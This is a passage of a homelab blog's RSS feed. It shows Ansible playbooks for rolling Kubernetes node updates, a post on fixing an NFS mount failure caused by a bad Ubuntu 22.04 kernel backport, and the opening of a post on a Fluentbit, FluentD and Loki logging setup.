</span></span><span style="display:flex;"><span>      <span style="color:#f92672">until</span>: <span style="color:#e6db74">&#39;(ceph_end.stdout | regex_findall(&#34;.*,up.*&#34;, multiline=True) | list | length) == (ceph_end.stdout_lines | length - 1)&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">retries</span>: <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delay</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run autoremove</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">autoremove</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">post_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unset osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/my_user/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd unset noout</span>
</span></span></code></pre></div><p>And finally, the control plane nodes. The main addition here is that I&rsquo;m using
Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/wait_for_module.html">wait_for module</a>
to wait until the CP components are up again. Or, to be more precise, to wait
until their ports are open, as I&rsquo;m not really doing a readiness check.
Here is the play:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update k8s controller hosts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-controller</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">/home/my_user/.local/bin/kubectl</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>          - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run apt upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">upgrade</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">reboot machine</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reboot</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for the machine to accept ansible commands again</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">reboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for_connection</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">cnc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">my_user</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for kubelet to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">10250</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for kube-apiserver to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">6443</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for kube-vip to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2112</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for etcd to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">2379</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for ceph mon to start</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wait_for</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;{{ ansible_default_ipv4.address }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">port</span>: <span style="color:#ae81ff">6789</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run autoremove</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">apt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">autoremove</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for one minute after controller update</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>The additional waits for the ports to accepts connections on all of the CP
components is a bit of insurance, to make sure the node is fully up again. This
could certainly be improved by checking the Pod status via <code>kubectl</code> instead,
but this approach has served me well for about a year now in my Nomad cluster,
so it should be fine here as well.</p>
<p>And with that, I&rsquo;ve finally got my Kubernetes nodes in the regular updates as
well. It was really high time, I set the nodes up back on the 20th of December
and haven&rsquo;t updated them since then. &#x1f62c;</p>
]]></content:encoded>
    </item>
    <item>
      <title>NFS problems with new Ubuntu 22.04 kernel</title>
      <link>https://blog.mei-home.net/posts/broken-kernel-nfs/</link>
      <pubDate>Sat, 17 Feb 2024 11:59:01 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/broken-kernel-nfs/</guid>
      <description>I did not have kernel issues for a really long time.</description>
      <content:encoded><![CDATA[<p>Yesterday&rsquo;s Homelab host update did not at all go as intended. I hit a kernel
bug in the NFS code.</p>
<p>To describe the problem, I need to go into a bit of detail on my setup, so
please bear with me.</p>
<p>I&rsquo;ve got a fleet of 8 Raspberry Pi CM4 and a single Udoo x86 II forming the
backbone of the compute in my Homelab. All of them do netbooting, with no
per-host storage at all. To be able to do host updates, including kernels,
the boot files used for netbooting are separated per host, and each host&rsquo;s files
are mounted to that host&rsquo;s <code>/boot/firmware</code> dir via NFS.
It looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ls -l /mnt/netboot/
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95210641</span> Feb <span style="color:#ae81ff">17</span> 12:10 abcd
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95206027</span> Feb <span style="color:#ae81ff">17</span> 12:45 efgh
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95209268</span> Feb <span style="color:#ae81ff">17</span> 11:49 ijkl
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95212903</span> Dec <span style="color:#ae81ff">21</span> 23:06 mnop
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95208373</span> Feb <span style="color:#ae81ff">17</span> 12:10 qrst
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">95211504</span> Feb <span style="color:#ae81ff">17</span> 11:49 uvwx
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">3</span> root    root   <span style="color:#ae81ff">94928358</span> Nov <span style="color:#ae81ff">26</span> 15:56 xyz
</span></span><span style="display:flex;"><span>ls -l /mnt/netboot/abcd/
</span></span><span style="display:flex;"><span>total <span style="color:#ae81ff">92267</span>
</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">1024</span> Jan <span style="color:#ae81ff">16</span>  <span style="color:#ae81ff">2023</span> README
</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">53004</span> Feb <span style="color:#ae81ff">16</span> 22:47 bcm2711-rpi-cm4.dtb
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">4624</span> Feb <span style="color:#ae81ff">16</span> 22:47 boot.scr
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">52476</span> Feb <span style="color:#ae81ff">16</span> 22:47 bootcode.bin
</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root         <span style="color:#ae81ff">285</span> Nov <span style="color:#ae81ff">26</span> 15:57 cmdline.txt
</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">1220</span> Jan <span style="color:#ae81ff">21</span>  <span style="color:#ae81ff">2023</span> config.txt
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">7265</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">5400</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">3170</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4cd.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">8382</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4db.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">8386</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4x.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">3170</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup_cd.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">10229</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup_db.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">10227</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup_x.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root    <span style="color:#ae81ff">59735369</span> Feb <span style="color:#ae81ff">17</span> 01:01 initrd.img
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">2</span> root   root      <span style="color:#ae81ff">738870</span> Feb <span style="color:#ae81ff">16</span> 22:48 overlays
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">2974880</span> Feb <span style="color:#ae81ff">16</span> 22:47 start.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">2250656</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">805084</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4cd.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">3746856</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4db.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">2998120</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4x.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">805084</span> Feb <span style="color:#ae81ff">16</span> 22:47 start_cd.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">4818728</span> Feb <span style="color:#ae81ff">16</span> 22:47 start_db.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">3721800</span> Feb <span style="color:#ae81ff">16</span> 22:47 start_x.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">607200</span> Feb <span style="color:#ae81ff">16</span> 22:47 uboot_rpi_4.bin
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">592696</span> Feb <span style="color:#ae81ff">16</span> 22:47 uboot_rpi_arm64.bin
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root    <span style="color:#ae81ff">10348331</span> Feb <span style="color:#ae81ff">17</span> 01:01 vmlinuz
</span></span></code></pre></div><p>This way, normal OS
updates work seamlessly, as the update copies the new kernel and such to the
NFS share from which dnsmasq supplies those files during netbooting.
The netbooting is controlled from my cluster master host. That&rsquo;s the one host
in my setup which does not have any kind of HA setup. It&rsquo;s also my one
&ldquo;can&rsquo;t have dependencies&rdquo; host. It&rsquo;s where I run things which everything else
depends on. This is things like my internal DNS server and my netboot setup.
Let&rsquo;s call this host <code>spof</code>, for no reason in particular. This host mounts
the directory with all of the netboot directories for the different hosts. Then,
<a href="https://thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a> runs a TFTP server for
other host&rsquo;s netbooting.</p>
<p>That should be enough for here, if you&rsquo;re interested in an in-depth description
of the setup, have a look at the <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">series of posts</a>
I wrote about it.</p>
<p>Anyway, last night I ran my regular update of all my Homelab hosts. At first,
I thought everything was well. But then, the first two freshly updated hosts
failed to reboot. After some investigation, I saw that on the <code>spof</code> host, the
netboot directory was no longer mounted. Trying to mount it manually, I was
greeted with this error:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount /mnt/netboot/
</span></span><span style="display:flex;"><span>mount.nfs: Protocol not supported
</span></span></code></pre></div><p>Uh - huh? Going with <code>-v</code> wasn&rsquo;t any more enlightening:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount -v /mnt/netboot/
</span></span><span style="display:flex;"><span>mount.nfs: timeout set <span style="color:#66d9ef">for</span> Sat Feb <span style="color:#ae81ff">17</span> 12:16:44 <span style="color:#ae81ff">2024</span>
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,vers=4.2,addr=10.86.5.132,clientaddr=10.86.1.200&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: mount<span style="color:#f92672">(</span>2<span style="color:#f92672">)</span>: Protocol not supported
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,vers=4,minorversion=1,addr=10.86.5.132,clientaddr=10.86.1.200&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: mount<span style="color:#f92672">(</span>2<span style="color:#f92672">)</span>: Protocol not supported
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,vers=4,addr=10.86.5.132,clientaddr=10.86.1.200&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: mount<span style="color:#f92672">(</span>2<span style="color:#f92672">)</span>: Protocol not supported
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,addr=10.86.5.132&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: prog 100003, trying vers<span style="color:#f92672">=</span>3, prot<span style="color:#f92672">=</span><span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>mount.nfs: trying 10.86.5.132 prog <span style="color:#ae81ff">100003</span> vers <span style="color:#ae81ff">3</span> prot TCP port <span style="color:#ae81ff">2049</span>
</span></span><span style="display:flex;"><span>mount.nfs: portmap query retrying: RPC: Program/version mismatch
</span></span><span style="display:flex;"><span>mount.nfs: prog 100003, trying vers<span style="color:#f92672">=</span>3, prot<span style="color:#f92672">=</span><span style="color:#ae81ff">17</span>
</span></span><span style="display:flex;"><span>mount.nfs: trying 10.86.5.132 prog <span style="color:#ae81ff">100003</span> vers <span style="color:#ae81ff">3</span> prot UDP port <span style="color:#ae81ff">2049</span>
</span></span><span style="display:flex;"><span>mount.nfs: portmap query failed: RPC: Program/version mismatch
</span></span><span style="display:flex;"><span>mount.nfs: Protocol not supported
</span></span></code></pre></div><p>So - either my Ceph NFS server or the client code suddenly forgot how NFS works.
Interestingly, this problem was only visible for the NFS mount from my Ceph NFS
server. Another NFS mount, which is supplied by the <code>spof</code> host itself for quick
and easy file transfers in the Homelab, worked without issue. I then also found
that the netboot NFS mount also still worked on the hosts which were not yet
updated.</p>
<p>Some googling later, I hit <a href="https://github.com/nfs-ganesha/nfs-ganesha/issues/1025">this bug</a>
against NFS Ganesha, which is the NFS implementation used by Ceph. That then
pointed me to <a href="https://github.com/gregkh/linux/commit/431a5010bce29809e68111c83e31bfd06d15a7d3">this fix in the kernel</a>
for an issue with NFS in relatively recent kernels. It looks like Ubuntu mistakenly
backported the broken NFS commit, but not the fix for it to their <code>5.15</code> kernels
in Ubuntu 22.04. For me, I saw the issue in the following kernels:</p>
<ul>
<li><code>linux-image-5.15.0-1046-raspi</code> on my Raspberry Pis</li>
<li><code>linux-image-5.15.0-94-generic</code> on my x86_64 hosts</li>
</ul>
<p><a href="https://github.com/longhorn/longhorn/issues/6887">This bug report on Longhorn</a>
also serves as an indication that it was a bad backport. It was opened back in
October, when the original bad commit entered the kernel, and then got another
flurry of responses when the LTS Ubuntu kernel got updated.</p>
<p>In the end, I did not have any other choice but to skip the kernel update on
my machines. I fixed the kernel version by running these commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;x86hosts_group&#34;</span> -a <span style="color:#e6db74">&#34;apt-mark hold linux-image-generic linux-headers-generic linux-generic&#34;</span>
</span></span><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;raspihosts_group&#34;</span> -a <span style="color:#e6db74">&#34;apt-mark hold linux-image-raspi linux-modules-extra-raspi&#34;</span>
</span></span></code></pre></div><p>After that, I could safely run <code>apt upgrade</code> on my hosts. For the two hosts
that I had already updated I needed to go a bit further. The first issue was that
I needed to get the <code>spof</code> host to be able to mount the netboot NFS volume again.</p>
<p>And I went about it in the most stupid way possible. Remember, that host is called
<code>spof</code> for no particular reason. It&rsquo;s central to my Homelabs functioning. And
I decided to use it as a testbed. So, smart guy that I am, I thought: Okay, the
kernel that&rsquo;s booted is in <code>/boot/firmware/vmlinuz</code>. So let&rsquo;s just copy the old
kernel from <code>/boot</code> there, reboot, and done!</p>
<p>Yeah, no. The <code>flash-kernel</code> tool is there for a reason. It does <em>something</em>
when copying the kernel/initrd from <code>/boot</code> to <code>/boot/firmware</code> on Pi hosts.
So now I had an unbootable <code>spof</code> host. I had to remove it from the rack mount,
including its SSD so I could connect a screen and see what the actual problem
was. The error message was that it couldn&rsquo;t find the disk, for reasons I don&rsquo;t
understand. I ended up just copying the kernel and initrd from a different Pi&rsquo;s
<code>/boot/firmware</code> to <code>spof</code>&rsquo;s <code>/boot/firmware</code> and got my host (and DNS&hellip;) back.</p>
<p>The <code>flash-kernel</code> tool then had to be invoked on all the already updated Pis
to switch them back to the older kernel and initrd:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>flash-kernel --force 5.15.0-1045-raspi
</span></span></code></pre></div><p>Let&rsquo;s hope that this fills my quota of kernel bugs in the Homelab for the
next 5 years or so. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 6: Logging with FluentD, Fluentbit and Loki</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-6-logging/</link>
      <pubDate>Tue, 13 Feb 2024 00:20:32 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-6-logging/</guid>
      <description>How I&amp;#39;m getting logs from /var/log/containers to Grafana</description>
      <content:encoded><![CDATA[<p>Wherein I document how I migrated my logging setup from Nomad to k8s.</p>
<p>This is part seven of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<h1 id="setup-overview">Setup overview</h1>
<p>Let&rsquo;s start with an overview of the setup.</p>
<figure>
    <img loading="lazy" src="logging-structure.png"
         alt="A diagram of the different logging stages. The top box shows redis logs, with the following content: &#39;1:M 28 Jan 2024 20:31:08.432 * Background saving terminated with success&#39;. This is a standard redis log line. The next box down shows the CRI-O logs, stored in /var/log/containers. It has the same log line as before, but now prepended with a timestamp, the output stream, &#39;stdout&#39; in this case, and the letter &#39;F&#39;. Next comes the Fluentbit log. This shows the original log line in a variable called &#39;log&#39;. There are additional variables, &#39;namespace_name&#39;, &#39;container_name&#39; and &#39;labels&#39;. Another box with an arrow going to the Fluentbit box indicates that the log was enhanced with the help of data from the kube-apiserver. Next come the Fluentd logs. The original log line, minus the timestamp and &#39;*&#39;, is now in a variable called &#39;msg&#39;, with the timestamp now in a variable called &#39;time&#39;. In addition, a new variable &#39;level&#39; with value &#39;info&#39; as been added. From FluentD, the next station is &#39;Loki&#39;, which stores the data in &#39;S3&#39; and &#39;Grafana&#39;, which takes input from Loki to display the logs."/> <figcaption>
            <p>Overview of my logging pipeline.</p>
        </figcaption>
</figure>

<p>It all starts out with the app&rsquo;s logs. Those are output to stdout in the container.
Then, my container runtime, <a href="https://cri-o.io/">cri-o</a>, takes that and writes
it to files in <code>/var/log/containers/</code> by default. It also prefixes the log line
with the timestamp, the stream it was coming from, and <code>F</code> for full log lines
as well as <code>P</code> for partial log lines. If I understand correctly, that&rsquo;s just the
standard log format Kubernetes and/or the <a href="https://github.com/kubernetes/cri-api/tree/master">CRI spec</a>
expect.</p>
<p>To collect all of these logs, I have a <a href="https://fluentbit.io/">Fluentbit</a>
DaemonSet deployed on all nodes. Mostly, this serves as a pretty dumb log shipper,
tailing all files under <code>/var/log/containers</code>. But before sending the logs
onward, I&rsquo;m enriching them with some k8s information, like labels, via the
<a href="https://docs.fluentbit.io/manual/pipeline/filters/kubernetes">Kubernetes filter</a>.</p>
